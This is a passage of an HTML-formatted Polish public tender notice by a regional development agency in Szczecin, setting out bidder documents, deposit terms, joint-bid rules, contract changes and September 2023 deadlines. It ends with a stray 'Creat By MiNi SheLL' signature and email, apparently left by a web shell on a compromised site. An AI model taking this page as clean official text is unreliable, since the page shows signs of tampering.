jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3. W przypadku, gdy Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi Wykonawcami (konsorcjum), warunek udziału w postępowaniu dotyczy tych robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył. Zamawiający nie dopuszcza by Wykonawca wykazywał doświadczenie grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał danego zakresu czynności. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt 1 Rozdziału VIII SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, zgodnego z wzorem stanowiącym Załącznik nr 3 do SWZ.<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>3) oświadczenie wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, zgodnego z wzorem stanowiącym Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem jej rodzaju, wartości, daty i miejsca wykonania oraz podmiotu, na rzecz którego roboty te zostały wykonane - Wzór wykazu stanowi Załącznik nr 4 do SWZ.<br/>2. Dowody określające, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty .</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kompletna oferta musi zawierać następujące dokumenty:<br/>1)	Formularz Oferty – zgodny w treści z Załącznikiem nr 1 do SWZ,<br/>2)	Pełnomocnictwo, w przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty podpisuje pełnomocnik,<br/>3)	Oświadczenie, o którym mowa w Rozdziale VIII pkt 1 SWZ, odpowiednio Wykonawca/ Podmiot udostępniający potencjał/każdy z Wykonawców wspólnie składających ofertę,<br/>4)	Wyjaśnienia uzasadniające zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy),<br/>5)	Odpowiedni dokument, o którym mowa w Rozdziale IX pkt 1 ppkt 5 SWZ (jeśli dotyczy),<br/>6)	Zobowiązanie Podmiotu udostępniającego potencjał (jeśli dotyczy),<br/>7)	Dowód wniesienia wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 10.000,00 zł (słownie złotych: dziesięć tysięcy).<br/>2. Wadium może być wniesione w:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony w Bank Millennium na konto 77 1160 2202 0000 0005 3577 9694: <br/>4.	Wadium uznaje się za wniesione skutecznie w momencie uznania na rachunku Zamawiającego (realnego wpływu wadium na rachunek Zamawiającego przed terminem składania ofert).<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2 ppkt 2-4, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia banku, ubezpieczyciela lub poręczyciela, w postaci elektronicznej wystawiony na: Zachodniopomorską Agencję Rozwoju Regionalnego S.A, ul. św. Ducha 2, 70-205 Szczecin.<br/>6.	Zamawiający wymaga, aby dokument potwierdzający złożenie wadium w formie, o której mowa w pkt 2 ppkt 2-4 Rozdziału X SWZ został załączony do oferty.<br/>7.	Zamawiający zwraca wadium na zasadach określonych w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>1)	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika takie pełnomocnictwo należy złożyć razem z ofertą.<br/>2)	Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne z treścią Załącznika Nr 2 do SWZ, aktualne na dzień składania ofert, o którym mowa w Rozdziale VIII pkt 1 SWZ.<br/>3)	Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>4)	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej, o której mowa w pkt 1 Rozdziału VII SWZ – dopuszcza łączne spełnianie warunku przez Wykonawców, w taki sposób, że każdy z nich może wykazać samodzielne wykonanie w całości jednej z robót wymaganej w warunku udziału, które łącznie spełnią warunek w całości. <br/>5)	Zgodnie z art. 117 ust. 3 Ustawy Pzp, w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy składający ofertę wspólną dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>6)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>2.	Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w pkt 1 niniejszego rozdziału <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Stosownie do art. 455 Ustawy Pzp, przewiduje możliwość dokonania zmiany zawartej Umowy. Zmiany wskazane zostały w paragrafie 19 Wzoru Umowy (istotnych postanowień umownych) stanowiących załącznik nr 7 do (SWZ).<br/>2. Zmiany treści Umowy wymagają formy pisemnej pod rygorem nieważności.<br/>3. Ze względu na ograniczoną liczbę znaków w tej rubryce ogłoszenia, Zamawiający nie może wypisać wszystkich zmian umowy zawartych w projekcie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy za pośrednictwem platformy elektronicznej znajdującej się pod adresem https://portal.smartpzp.pl/zarr,</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-04 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-03</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów wskazanych w rozdziale VIII pkt 2 ppkt 3 SWZ:<br/><br/> - składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzający że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/>- dokument, o którym mowa powyżej powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/><br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Dokumenty te powinny być wystawione w terminie wskazanym powyżej.

Creat By MiNi SheLL
Email: jattceo@gmail.com